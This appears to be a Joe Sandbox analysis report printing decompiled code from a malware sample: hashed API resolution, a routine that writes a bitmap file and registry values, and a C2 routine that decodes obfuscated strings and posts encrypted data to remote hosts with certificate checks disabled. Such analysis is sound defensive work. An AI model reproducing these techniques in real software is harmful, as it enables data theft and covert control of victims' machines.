                • Opcode Fuzzy Hash: bbc7e4ae8c72ec1d1797ae841e408d0b6833eddce743ba7644452bdf26604e50
                • Instruction Fuzzy Hash: BAC0023A014108EFCB065F85E808C85BFEAFB18760B49C0A1F6084B532C772E860EB55
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F5F98(long _a4) {
                				void* _t4;
                
                				_t4 = RtlAllocateHeap( *( *[fs:0x30] + 0x18), 8, _a4); // executed
                				return _t4;
                			}




                0x010f5fa9
                0x010f5fb0

                APIs
                • RtlAllocateHeap.NTDLL(?,00000008,?,?,010F6457,00000014,?), ref: 010F5FA9
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 24606de61849a942b02f97e035f2cbd117f4632fdf5e19f98b8135a83128d422
                • Instruction ID: 79e9479f6f3f8bf2f94aea58278a3da3c2e84da366ff895365eb23a81310c50a
                • Opcode Fuzzy Hash: 24606de61849a942b02f97e035f2cbd117f4632fdf5e19f98b8135a83128d422
                • Instruction Fuzzy Hash: FAC08C32080648EBC7135F84D800F417B78F728B40F004020B20046460C675E860DB84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F5FB3(void* _a4) {
                				char _t4;
                
                				_t4 = RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _a4); // executed
                				return _t4;
                			}




                0x010f5fc4
                0x010f5fcb

                APIs
                • RtlFreeHeap.NTDLL(?,00000000,?,?,010F7F03,?), ref: 010F5FC4
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 3df4603beb533f665c8b911c4b95d33380a766ae5e8c2d45bf756daae29b4132
                • Instruction ID: 348841dc292994c627f27b10069520b6ef369a3a3c41ab3e6d68f5ed89b8fce5
                • Opcode Fuzzy Hash: 3df4603beb533f665c8b911c4b95d33380a766ae5e8c2d45bf756daae29b4132
                • Instruction Fuzzy Hash: FAC08C32080208EBC7125F84DC00F807B6CF718B00F000020B20446470C275E8A0DB84
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F8BB4(long* _a4) {
                				long _t4;
                
                				_t4 = GetLogicalDriveStringsW( *_a4, _a4[1]); // executed
                				return _t4;
                			}




                0x010f8bbf
                0x010f8bc6

                APIs
                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 010F8BBF
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: DriveLogicalStrings
                • String ID:
                • API String ID: 2022863570-0
                • Opcode ID: c5423909199db1aba5211b4d3d0297c8ea768d4d08004c5f1c0de96a24dc7389
                • Instruction ID: 5500faa5ae7de889d66aaae48558dcb455053df47c524da8706e2334b572c49e
                • Opcode Fuzzy Hash: c5423909199db1aba5211b4d3d0297c8ea768d4d08004c5f1c0de96a24dc7389
                • Instruction Fuzzy Hash: DBC0923600420CEFCB029FC9E808C85BFE9EB18B2170080A1F6084B531CB72E9A0EB95
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E010F8841(WCHAR** _a4) {
                				int _t4;
                
                				_t4 = GetUserNameW( *_a4, _a4[1]); // executed
                				return _t4;
                			}




                0x010f884c
                0x010f8853

                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 010F884C
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                • Opcode ID: 876c7f6a8eee993b7647ca6b9c7d5d441a850750b01d1e6cfe5e058e1a662eea
                • Instruction ID: 689a545a7f3e1002a14748e80e70118455bc224a2bb498577a44da438c45b67b
                • Opcode Fuzzy Hash: 876c7f6a8eee993b7647ca6b9c7d5d441a850750b01d1e6cfe5e058e1a662eea
                • Instruction Fuzzy Hash: CDC0923A000208EF8B029F88E848C85BFE9EB1C700701C061F6088B132CB72E864EB96
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E010F581D(intOrPtr _a4) {
                				short* _v8;
                				intOrPtr _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _t29;
                				intOrPtr _t34;
                				intOrPtr _t38;
                				intOrPtr _t45;
                				intOrPtr* _t47;
                				intOrPtr _t48;
                				void* _t49;
                				void* _t52;
                
                				if( *0x1101214 == 0) {
                					 *0x1101214 = 0x27d05eb2;
                					 *0x1101214 = E010F581D( *0x1101214);
                				}
                				if( *0x1101218 == 0) {
                					 *0x1101218 = 0xffffffffbb93705c;
                					 *0x1101218 = E010F581D( *0x1101218);
                				}
                				_v8 = 0;
                				_t29 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                				_v20 = _t29 + 0xc;
                				_t47 =  *((intOrPtr*)(_t29 + 0xc));
                				do {
                					_t45 =  *((intOrPtr*)(_t47 + 0x18));
                					_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x3c)) + _t45 + 0x78));
                					if(_t48 == 0) {
                						goto L15;
                					} else {
                						_v16 = E010F10BB( *((intOrPtr*)(_t47 + 0x30)), 0);
                						_t49 = _t48 + _t45;
                						_t34 =  *((intOrPtr*)(_t49 + 0x18));
                						if(_t34 != 0) {
                							_v12 = _t34;
                							_t52 =  *((intOrPtr*)(_t49 + 0x24)) + _t45;
                							while(1) {
                								asm("lodsd");
                								_t34 = E010F1096(_t34 + _t45, _v16);
                								if(_t34 == _a4) {
                									break;
                								}
                								_t52 = _t52 + 2;
                								_v12 = _v12 - 1;
                								if(_v12 != 0) {
                									continue;
                								}
                								goto L13;
                							}
                							asm("lodsd");
                							_v8 = _t34 + _t45;
                							if(E010F5755(_t34 + _t45) != 0) {
                								_t38 = E010F57A7(_v8); // executed
                								_v8 = _t38;
                							}
                						}
                						L13:
                						if(_v8 == 0) {
                							goto L15;
                						} else {
                						}
                					}
                					break;
                					L15:
                					_t47 =  *_t47;
                				} while (_v20 != _t47);
                				return _v8;
                			}















                0x010f582d
                0x010f5839
                0x010f5849
                0x010f5849
                0x010f5855
                0x010f5861
                0x010f5871
                0x010f5871
                0x010f5876
                0x010f5883
                0x010f5889
                0x010f588c
                0x010f588f
                0x010f588f
                0x010f5897
                0x010f589c
                0x00000000
                0x010f589e
                0x010f58ab
                0x010f58ae
                0x010f58b0
                0x010f58b5
                0x010f58b7
                0x010f58c2
                0x010f58c4
                0x010f58c4
                0x010f58cb
                0x010f58d3
                0x00000000
                0x00000000
                0x010f58fd
                0x010f5900
                0x010f5907
                0x00000000
                0x00000000
                0x00000000
                0x010f5907
                0x010f58e0
                0x010f58e3
                0x010f58ee
                0x010f58f3
                0x010f58f8
                0x010f58f8
                0x010f58fb
                0x010f5909
                0x010f590d
                0x00000000
                0x00000000
                0x010f590f
                0x010f590d
                0x00000000
                0x010f5911
                0x010f5911
                0x010f5913
                0x010f5925

                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 16fbe67fb1645840402c68db159e2113da06c23a3d9541465503bc04f7eb6f71
                • Instruction ID: a42ac688332c3966da2772abc4ff28e212d1dde2618f526bc371961585c76075
                • Opcode Fuzzy Hash: 16fbe67fb1645840402c68db159e2113da06c23a3d9541465503bc04f7eb6f71
                • Instruction Fuzzy Hash: DE319CB1E00206EFCB15DF58CC82AA9B7B0FB14310F2441BDDA54AB651E375DA81DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			_entry_() {
                				void* _t5;
                
                				E010F5E5C();
                				E010F92E1(0); // executed
                				E010FD244(); // executed
                				E010FE815(_t5); // executed
                				ExitProcess(0);
                			}




                0x010fe8d5
                0x010fe8dc
                0x010fe8e1
                0x010fe8e6
                0x010fe8ed

                APIs
                  • Part of subcall function 010F5E5C: HeapCreate.KERNEL32(00040000,00000000,00000000,040D58A8,?,?,010FE8DA), ref: 010F5E81
                  • Part of subcall function 010F92E1: NtSetInformationThread.NTDLL(00000000,?,00000000,00000000,?,010FE8E1,00000000), ref: 010F9302
                • ExitProcess.KERNEL32(00000000,00000000), ref: 010FE8ED
                • GetCommandLineA.KERNEL32 ref: 010FE8F3
                • GetModuleHandleA.KERNEL32 ref: 010FE8F8
                • GetCommandLineA.KERNEL32 ref: 010FE8FD
                • GetAtomNameW.KERNEL32 ref: 010FE902
                • SetLastError.KERNEL32 ref: 010FE907
                • GetCommandLineW.KERNEL32 ref: 010FE90C
                • FreeLibrary.KERNEL32 ref: 010FE911
                • GetCommandLineW.KERNEL32 ref: 010FE916
                • GetFileAttributesW.KERNEL32 ref: 010FE91B
                • FormatMessageW.KERNEL32 ref: 010FE920
                • GetDlgItemTextW.USER32 ref: 010FE925
                • LoadImageW.USER32 ref: 010FE92A
                • EndDialog.USER32 ref: 010FE92F
                • DefWindowProcW.USER32 ref: 010FE934
                • LoadMenuW.USER32 ref: 010FE939
                • GetDlgItemTextW.USER32 ref: 010FE93E
                • LoadImageW.USER32 ref: 010FE943
                • IsDlgButtonChecked.USER32 ref: 010FE948
                • GetClassNameW.USER32 ref: 010FE94D
                • CreateDialogParamW.USER32 ref: 010FE952
                • LoadMenuW.USER32 ref: 010FE957
                • GetDlgItem.USER32 ref: 010FE95C
                • CreateMenu.USER32 ref: 010FE961
                • DefWindowProcW.USER32 ref: 010FE966
                • DefWindowProcW.USER32 ref: 010FE96B
                • GetTextCharset.GDI32 ref: 010FE970
                • CreateFontW.GDI32 ref: 010FE975
                • GetDeviceCaps.GDI32 ref: 010FE97A
                • CreateSolidBrush.GDI32 ref: 010FE97F
                • SelectPalette.GDI32 ref: 010FE984
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Create$CommandLineLoad$ItemMenuProcTextWindow$DialogImageName$AtomAttributesBrushButtonCapsCharsetCheckedClassDeviceErrorExitFileFontFormatFreeHandleHeapInformationLastLibraryMessageModulePaletteParamProcessSelectSolidThread
                • String ID:
                • API String ID: 1458127204-0
                • Opcode ID: b159b678a42fd31329aff5fed624e82e36e3d8f84ab25edcaf6f0196dff0c4d5
                • Instruction ID: d17bee7b9253d2381456e92bb7a408d8feb92e2991979c3446a5985bfbc80656
                • Opcode Fuzzy Hash: b159b678a42fd31329aff5fed624e82e36e3d8f84ab25edcaf6f0196dff0c4d5
                • Instruction Fuzzy Hash: D7F05A1400C5B324D0F433F9E85B3DD38051FB1910F2345AE93E8A0CBB1C8441809177
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 9 10f7612-10f7673 11 10f767a-10f768a 9->11 12 10f7675 9->12 19 10f768c 11->19 20 10f7691-10f76a1 11->20 13 10f7c7d-10f7c81 12->13 15 10f7c8c-10f7c90 13->15 16 10f7c83 13->16 17 10f7c92-10f7c96 15->17 18 10f7ca1-10f7ca5 15->18 16->15 17->18 21 10f7c98 17->21 22 10f7ca7 18->22 23 10f7cb0-10f7cb4 18->23 19->13 29 10f76a8-10f76c3 call 10fd34b 20->29 30 10f76a3 20->30 21->18 22->23 24 10f7cbf-10f7cc3 23->24 25 10f7cb6 23->25 27 10f7ccd-10f7cd1 24->27 28 10f7cc5-10f7cc8 call 10f5fb3 24->28 25->24 33 10f7cdb-10f7cdf 27->33 34 10f7cd3-10f7cd6 call 10f5fb3 27->34 28->27 39 10f76ed-10f772a 29->39 40 10f76c5-10f76ea 29->40 30->13 36 10f7cea-10f7cee 33->36 37 10f7ce1 33->37 34->33 41 10f7cf9-10f7cfd 36->41 42 10f7cf0 36->42 37->36 43 10f772f-10f7739 39->43 40->39 44 10f7cff 41->44 45 10f7d08-10f7d0c 41->45 42->41 43->43 47 10f773b-10f7786 43->47 44->45 48 10f7d0e-10f7d11 45->48 49 10f7d19-10f7d1f 45->49 53 10f778d-10f779b 47->53 54 10f7788 47->54 48->49 56 10f779d 53->56 57 10f77a2-10f77b3 call 10f5f98 53->57 54->13 56->13 60 10f77ba-10f77cb call 10f64cc 57->60 61 10f77b5 57->61 64 10f77cd 60->64 65 10f77d2-10f77eb 60->65 61->13 64->13 67 10f77ed-10f77fc call 10f5fb3 65->67 68 10f7801-10f7814 GetTextExtentPoint32W 65->68 67->13 69 10f781b-10f7831 68->69 70 10f7816 68->70 74 10f7838-10f7846 69->74 75 10f7833 69->75 70->13 77 10f784d-10f78bc DrawTextW 74->77 78 10f7848 74->78 75->13 82 10f78be 77->82 83 10f78c3-10f796b 77->83 78->13 82->13 87 10f796d 83->87 88 10f7972-10f799f 83->88 87->13 91 10f79a6-10f79f5 call 10f16b4 88->91 92 10f79a1 88->92 98 10f79fa-10f7a04 91->98 92->13 98->98 99 10f7a06-10f7a28 CreateFileW 98->99 100 10f7a2f-10f7a49 WriteFile 99->100 101 10f7a2a 99->101 102 10f7a4b 100->102 103 10f7a50-10f7a67 WriteFile 100->103 101->13 102->13 104 10f7a6e-10f7a85 WriteFile 103->104 105 10f7a69 103->105 106 10f7a8c-10f7ab0 call 10f6393 104->106 107 10f7a87 104->107 105->13 111 10f7ab7-10f7b15 call 10f16b4 106->111 112 10f7ab2 106->112 107->13 115 10f7b1a-10f7b24 111->115 112->13 115->115 116 10f7b26-10f7b64 RegCreateKeyExW 115->116 118 10f7b6b-10f7b93 116->118 119 10f7b66 116->119 120 10f7b98-10f7ba2 118->120 119->13 120->120 121 10f7ba4-10f7bd3 RegSetValueExW 120->121 123 10f7bda-10f7c17 121->123 124 10f7bd5 121->124 125 10f7c1c-10f7c26 123->125 124->13 125->125 126 10f7c28-10f7c64 RegSetValueExW 125->126 128 10f7c68-10f7c6c 126->128 129 10f7c66 126->129 128->13 130 10f7c6e-10f7c75 128->130 129->13 130->13
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID:
                • String ID: ($BM
                • API String ID: 0-2980357723
                • Opcode ID: 97941e47f3cd81a449be38d339febf7becebe54931b97c9095c01c6af71f775c
                • Instruction ID: 45a0bf420d3fed41afb0fba199be94e93806e47f8e27ffa6021e2df0e6af149f
                • Opcode Fuzzy Hash: 97941e47f3cd81a449be38d339febf7becebe54931b97c9095c01c6af71f775c
                • Instruction Fuzzy Hash: 5E224A71900209EFEB2A9F94DD4ABEDBBB5FF04301F1041ADE611BA1A1D7B58984CF52
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 206 10fa5fb-10fa64c 207 10fa64e 206->207 208 10fa653-10fa65b 206->208 209 10faa5b-10faa5f 207->209 210 10fa65d 208->210 211 10fa662-10fa680 call 10f565d 208->211 213 10faa6a-10faa6e 209->213 214 10faa61 209->214 210->209 220 10fa687-10fa69b call 10f5f98 211->220 221 10fa682 211->221 215 10faa79-10faa7d 213->215 216 10faa70 213->216 214->213 218 10faa7f 215->218 219 10faa88-10faa8c 215->219 216->215 218->219 222 10faa8e-10faa91 call 10f5fb3 219->222 223 10faa96-10faa9a 219->223 229 10fa69d 220->229 230 10fa6a2-10fa6c4 call 10f13ee call 10facc5 220->230 221->209 222->223 227 10faa9c-10faa9f call 10f5fb3 223->227 228 10faaa4-10faaa8 223->228 227->228 232 10faaaa-10faaad call 10f5fb3 228->232 233 10faab2-10faab6 228->233 229->209 248 10fa6cb-10fa6d7 call 10faae7 230->248 249 10fa6c6 230->249 232->233 234 10faab8-10faabb call 10f5fb3 233->234 235 10faac0-10faac4 233->235 234->235 239 10faace-10faad2 235->239 240 10faac6-10faac9 call 10f5fb3 235->240 244 10faadc-10faae4 239->244 245 10faad4-10faad7 call 10f5fb3 239->245 240->239 245->244 252 10fa6de-10fa6ea call 10fac81 248->252 253 10fa6d9 248->253 249->209 256 10fa6ec 252->256 257 10fa6f1-10fa702 call 10f64cc 252->257 253->209 256->209 260 10fa709-10fa721 InternetOpenW 257->260 261 10fa704 257->261 262 10fa728-10fa73f 260->262 263 10fa723 260->263 261->209 264 10fa744-10fa74e 262->264 263->209 264->264 265 10fa750-10fa764 264->265 266 10fa76a-10fa76e 265->266 267 10fa775-10fa785 266->267 268 10fa770 266->268 270 10fa797-10fa7bb call 10f10bb 267->270 271 10fa787-10fa795 267->271 268->209 275 10fa7bd-10fa7c7 270->275 276 10fa7c9-10fa7ce 270->276 271->266 277 10fa7ef-10fa817 275->277 278 10fa7dc-10fa7ea 276->278 279 10fa7d0-10fa7da 276->279 283 10fa81e-10fa840 InternetConnectW 277->283 284 10fa819 277->284 278->266 279->277 285 10fa855-10fa875 283->285 286 10fa842-10fa850 283->286 284->283 289 10fa89a-10fa8a0 285->289 290 10fa877-10fa895 285->290 286->266 291 10fa8ed-10fa91a HttpSendRequestW 289->291 292 10fa8a2-10fa8c5 289->292 290->266 302 10fa94f-10fa976 291->302 303 10fa91c-10fa94a 291->303 296 10fa8cc-10fa8e6 292->296 297 10fa8c7 292->297 296->291 304 10fa8e8 296->304 299 10faa23-10faa2c InternetCloseHandle 297->299 305 10faa35-10faa51 299->305 302->299 308 10fa97c-10fa980 302->308 303->266 304->299 305->266 308->299 310 10fa986-10fa98b 308->310 310->299 312 10fa991-10fa996 310->312 312->299 314 10fa99c-10fa9b6 InternetQueryDataAvailable 312->314 315 10fa9ba-10fa9cb call 10f5f98 314->315 316 10fa9b8 314->316 319 10fa9cd 315->319 320 10fa9d2-10fa9e7 315->320 316->299 319->209 322 10fa9fa-10faa03 320->322 323 10fa9e9-10fa9f8 call 10f5fb3 320->323 325 10faa05-10faa0a 322->325 326 10faa10-10faa1f call 10f5fb3 322->326 323->299 325->326 328 10faa0c 325->328 326->299 328->209
                C-Code - Quality: 24%
                			E010FA5FB(intOrPtr _a4, intOrPtr _a8) {
                				void* _v8;
                				void* _v12;
                				void* _v16;
                				WCHAR* _v20;
                				WCHAR* _v24;
                				void* _v28;
                				long _v32;
                				long _v36;
                				long _v40;
                				signed int _v44;
                				long _v48;
                				char _v56;
                				char _v68;
                				char _v84;
                				short _v340;
                				signed int _t137;
                				void* _t145;
                				signed int* _t146;
                				signed int _t147;
                				void* _t149;
                				void* _t154;
                				short* _t159;
                				void* _t161;
                				long _t164;
                				long _t165;
                				int _t166;
                				int _t173;
                				short _t194;
                				long _t196;
                				long _t199;
                				void* _t203;
                				short* _t204;
                				void* _t205;
                				void* _t206;
                				void* _t207;
                				void* _t208;
                				void* _t209;
                				void* _t211;
                
                				_v24 = 0;
                				_v40 = 0;
                				_v36 = 0;
                				_v28 = 0;
                				_v32 = 0;
                				_v20 = 0;
                				_v8 = 0;
                				_v12 = 0;
                				_v16 = 0;
                				if(_a4 != 0) {
                					_t205 =  *0x1100fcc; // 0x1289ff0
                					if(_t205 != 0) {
                						_t137 = E010F565D(0x1100fa0, 0x10, _a4, _a8 + 0x10 & 0xfffffff0);
                						_t192 = _t137;
                						if(_t137 != 0) {
                							_v40 = E010F5F98(_t192 * 4);
                							if(_v40 != 0) {
                								E010F13EE(_a4, _t192, _v40);
                								_v28 = E010FACC5(0x1100f90, _v40);
                								if(_v28 != 0) {
                									_v36 = E010FAAE7();
                									if(_v36 != 0) {
                										_v24 = E010FAC81();
                										if(_v24 != 0) {
                											_v20 = E010F64CC(0x1100a78);
                											if(_v20 != 0) {
                												_t145 = InternetOpenW(_v24, 0, 0, 0, 0); // executed
                												_v8 = _t145;
                												if(_v8 != 0) {
                													_t146 =  &_v68;
                													 *_t146 = 0x22495fbd;
                													_t146[1] = 0x22525fbe;
                													_t146[2] = 0x22065fed;
                													_t196 = 3;
                													do {
                														 *_t146 =  *_t146 ^ 0x22065fed;
                														_t146 =  &(_t146[1]);
                														_t196 = _t196 - 1;
                													} while (_t196 != 0);
                													_t147 =  &_v56;
                													 *_t147 = 0x3a;
                													 *((short*)(_t147 + 2)) = 0x2f;
                													 *((short*)(_t147 + 4)) = 0x2f;
                													 *((short*)(_t147 + 6)) = 0;
                													while( *_t205 != 0) {
                														_t149 =  *0x11012e0(_t205,  &_v56);
                														_t208 = _t207 + 8;
                														if(_t149 != 0) {
                															memcpy( &_v340, _t205, _t149 - _t205);
                															_t209 = _t208 + 0xc;
                															asm("stosw");
                															_t154 = E010F10BB( &_v340, 0);
                															if(_t154 != 0xeb9f5c34) {
                																if(_t154 != 0xeb869d00) {
                																	_t147 =  *0x11012d4(_t205);
                																	_t207 = _t209 + 4;
                																	_t205 = _t205 + 2 + _t147 * 2;
                																	continue;
                																} else {
                																	_t194 = 0x50;
                																	_t203 = 0x400000;
                																	goto L30;
                																}
                															} else {
                																_t194 = 0x1bb;
                																_t203 = 0x800000;
                																L30:
                																_t206 = _t205 + 6;
                																 *0x11012dc( &_v340, _t206);
                																_t159 =  *0x11012e8( &_v340, 0x2f);
                																_t211 = _t209 + 0x10;
                																if(_t159 != 0) {
                																	 *_t159 = 0;
                																}
                																_t161 = InternetConnectW(_v8,  &_v340, _t194, 0, 0, 3, 0, 0); // executed
                																_v12 = _t161;
                																if(_v12 != 0) {
                																	_v16 =  *0x11015c4(_v12,  &_v68, _v36, 0, 0, 0, _t203, 0);
                																	if(_v16 != 0) {
                																		if(_t194 != 0x1bb) {
                																			L41:
                																			_t164 =  *0x11012c8(_v28);
                																			_t165 =  *0x11012d4(_v20);
                																			_t211 = _t211 + 8;
                																			_t166 = HttpSendRequestW(_v16, _v20, _t165, _v28, _t164); // executed
                																			if(_t166 != 0) {
                																				_v48 = 0x10;
                																				_v44 = 0;
                																				_t204 =  &_v84;
                																				_push( &_v44);
                																				_push( &_v48);
                																				_push(_t204);
                																				_push(0x13);
                																				_push(_v16);
                																				if( *0x11015c0() == 0 ||  *_t204 != 0x32 ||  *((short*)(_t204 + 2)) != 0x30 ||  *((short*)(_t204 + 4)) != 0x30) {
                																					goto L57;
                																				} else {
                																					_v48 = 0;
                																					_t173 = InternetQueryDataAvailable(_v16,  &_v48, 0, 0); // executed
                																					if(_t173 != 0) {
                																						_t147 = E010F5F98(_v48 + 1);
                																						_v32 = _t147;
                																						if(_v32 != 0) {
                																							_push( &_v48);
                																							_push(_v48);
                																							_push(_v32);
                																							_push(_v16);
                																							if( *0x11015d0() != 0) {
                																								_t147 = _v32;
                																								_t199 = _v48;
                																								if( *_t147 != 0x7b ||  *((char*)(_t147 + _t199 - 1)) != 0x7d) {
                																									E010F5FB3(_v32);
                																									_v32 = 0;
                																									goto L57;
                																								} else {
                																								}
                																							} else {
                																								E010F5FB3(_v32);
                																								_v32 = 0;
                																								goto L57;
                																							}
                																						} else {
                																						}
                																					} else {
                																						goto L57;
                																					}
                																				}
                																			} else {
                																				 *0x11015bc(_v12);
                																				 *0x11015bc(_v16);
                																				_v12 = 0;
                																				_v16 = 0;
                																				_t147 =  *0x11012d4(_t206);
                																				_t207 = _t211 + 4;
                																				_t205 = _t206 + 2 + _t147 * 2;
                																				continue;
                																			}
                																		} else {
                																			_v44 = 0;
                																			_v48 = 4;
                																			_push( &_v48);
                																			_push( &_v44);
                																			_push(0x1f);
                																			_push(_v16);
                																			if( *0x11015b8() != 0) {
                																				_v44 = _v44 | 0x84603300;
                																				_push(4);
                																				_push( &_v44);
                																				_push(0x1f);
                																				_push(_v16);
                																				if( *0x11015b4() != 0) {
                																					goto L41;
                																				} else {
                																					goto L57;
                																				}
                																			} else {
                																				L57:
                																				InternetCloseHandle(_v12); // executed
                																				 *0x11015bc(_v16);
                																				_v12 = 0;
                																				_v16 = 0;
                																				_t147 =  *0x11012d4(_t206);
                																				_t207 = _t211 + 4;
                																				_t205 = _t206 + 2 + _t147 * 2;
                																				continue;
                																			}
                																		}
                																	} else {
                																		 *0x11015bc(_v12);
                																		_v12 = 0;
                																		_t147 =  *0x11012d4(_t206);
                																		_t207 = _t211 + 4;
                																		_t205 = _t206 + 2 + _t147 * 2;
                																		continue;
                																	}
                																} else {
                																	_t147 =  *0x11012d4(_t206);
                																	_t207 = _t211 + 4;
                																	_t205 = _t206 + 2 + _t147 * 2;
                																	continue;
                																}
                															}
                														} else {
                															_t147 =  *0x11012d4(_t205);
                															_t207 = _t208 + 4;
                															_t205 = _t205 + 2 + _t147 * 2;
                															continue;
                														}
                														goto L58;
                													}
                												} else {
                												}
                											} else {
                											}
                										} else {
                										}
                									} else {
                									}
                								} else {
                								}
                							} else {
                							}
                						} else {
                						}
                					} else {
                					}
                				} else {
                				}
                				L58:
                				if(_v16 != 0) {
                					_t147 =  *0x11015bc(_v16);
                				}
                				if(_v12 != 0) {
                					_t147 =  *0x11015bc(_v12);
                				}
                				if(_v8 != 0) {
                					_t147 =  *0x11015bc(_v8);
                				}
                				if(_v36 != 0) {
                					_t147 = E010F5FB3(_v36);
                				}
                				if(_v20 != 0) {
                					_t147 = E010F5FB3(_v20);
                				}
                				if(_v24 != 0) {
                					_t147 = E010F5FB3(_v24);
                				}
                				if(_v32 != 0) {
                					_t147 = E010F5FB3(_v32);
                				}
                				if(_v28 != 0) {
                					_t147 = E010F5FB3(_v28);
                				}
                				if(_v40 != 0) {
                					return E010F5FB3(_v40);
                				}
                				return _t147;
                			}









































                0x010fa609
                0x010fa610
                0x010fa617
                0x010fa61e
                0x010fa625
                0x010fa62c
                0x010fa633
                0x010fa63a
                0x010fa641
                0x010fa64c
                0x010fa653
                0x010fa65b
                0x010fa677
                0x010fa67c
                0x010fa680
                0x010fa694
                0x010fa69b
                0x010fa6a9
                0x010fa6bd
                0x010fa6c4
                0x010fa6d0
                0x010fa6d7
                0x010fa6e3
